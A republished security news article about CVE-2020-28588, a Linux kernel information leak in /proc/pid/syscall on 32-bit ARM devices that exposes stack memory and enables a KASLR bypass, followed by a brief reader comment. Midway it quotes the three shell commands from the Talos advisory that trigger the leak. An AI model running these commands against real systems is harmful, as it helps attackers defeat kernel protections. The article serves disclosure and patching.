The information-disclosure flaw
allows KASLR bypass and the discovery of additional, unpatched vulnerabilities
in ARM devices.
An
information-disclosure security vulnerability has been discovered in the Linux
kernel, which can be exploited to expose information in the kernel stack memory
of vulnerable devices.
Specifically,
the bug (CVE-2020-28588) exists in the
/proc/pid/syscall functionality of 32-bit ARM devices running Linux, according
to Cisco Talos, which discovered the vulnerability. It arises from an improper
conversion of numeric values when reading the file.
With a few commands, attackers
can output 24 bytes of uninitialized stack memory, which can be used to bypass
kernel address space layout randomization (KASLR). KASLR is
an anti-exploit technique that places various objects at random to prevent
predictable patterns that are guessable by adversaries.
Attacks also
would be “impossible to detect on a network remotely,” the firm explained. And,
“if utilized correctly, an attacker could leverage this information leak to
successfully exploit additional unpatched Linux vulnerabilities.”
Kernel-Bug Details
Proc is a
special, pseudo-filesystem in Unix-like operating systems that is used for dynamically accessing process data held
in the kernel. It presents information about processes and other system
information in a hierarchical file-like structure. For instance, it contains
/proc/[pid] subdirectories, each of which contains files and subdirectories
exposing information about specific processes, readable by using the
corresponding process ID. In the case of the “syscall” file, it’s a legitimate
Linux operating system file that contains logs of system calls used by the
kernel.
An attacker
could exploit the vulnerability by reading /proc/<pid>/syscall. “We can
see the output on any given Linux system whose kernel was configured with
CONFIG_HAVE_ARCH_TRACEHOOK,” according to Cisco’s bug report, publicly disclosed on
Tuesday..
“This file
exposes the system call number and argument registers for the system call
currently being executed by the process, followed by the values of the stack
pointer and program counter registers,” explained the firm. “The values of all
six argument registers are exposed, although most system call use fewer
registers.”
The shell
commands that trigger the vulnerability are:
- #
echo 0 > /proc/sys/kernel/randomize_va_space (# only needed for a
cleaner output)
- $
while true; do cat /proc/self/syscall; done | uniq (# waits for changes)
- $
while true; do free &>/dev/null; done (# triggers changes)
Security Patch Updates Available
Cisco Talos
researchers first discovered the issue on an Azure Sphere device (version
20.10), a 32-bit ARM device that runs a patched Linux kernel. It’s been present
since v5.1-rc4 of the kernel.
“Users are
encouraged to update these affected products as soon as possible: Linux Kernel
versions 5.10-rc4, 5.4.66 and 5.9.8,” according to the advisory. “Talos tested
and confirmed these versions of the Linux kernel could be exploited by this
vulnerability.”
Linux kernel
bugs are rare but do happen. For instance, last October Google and Intel warned
of the high-severity “BleedingTooth” flaw in BlueZ, the Linux
Bluetooth protocol stack that provides support for core Bluetooth layers and
protocols to Linux-based internet of things (IoT) devices. It could be
exploited in a “zero-click” attack and potentially allow for escalated
privileges on affected devices.
Scoure: threatpost.com
Hi, thanks for sharing, great work.
ReplyDelete